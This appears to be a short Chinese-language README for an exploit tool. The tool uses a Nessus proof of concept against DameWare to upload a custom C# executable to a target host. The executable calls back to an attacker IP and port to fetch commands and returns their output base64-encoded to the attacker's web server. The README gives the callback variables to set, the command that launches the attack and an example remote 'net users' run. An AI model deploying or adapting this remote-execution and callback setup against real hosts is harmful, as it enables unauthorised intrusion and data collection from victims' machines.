该仓库旨在利用 Nessus POC,配合自定义的 C# 可执行文件,在远程主机上执行命令并获取命令输出。
Python 文件用于启动一个 Web 服务器、执行漏洞利用,然后通过该 Web 服务器获取结果。
C# exe 通过漏洞利用被上传到目标主机。
当在目标上执行时,exe 会回调指定的 IP/Port 以获取要运行的命令(路径为 /cmd)。
命令执行完成后,exe 将输出发送到同一 Web 服务器。
发送输出是通过一个 GET 请求完成的,该请求会产生 404,但这没关系,我们只需要 base64 数据。
C# exe 有两个需要更新的变量:
这些变量指向攻击系统的 IP 和端口:
string ip = "10.8.0.3";
string port = "8000";
python dameware-poc.py -t target_ip -e executable_to_upload
以下示例在远程主机上运行 net users 命令:
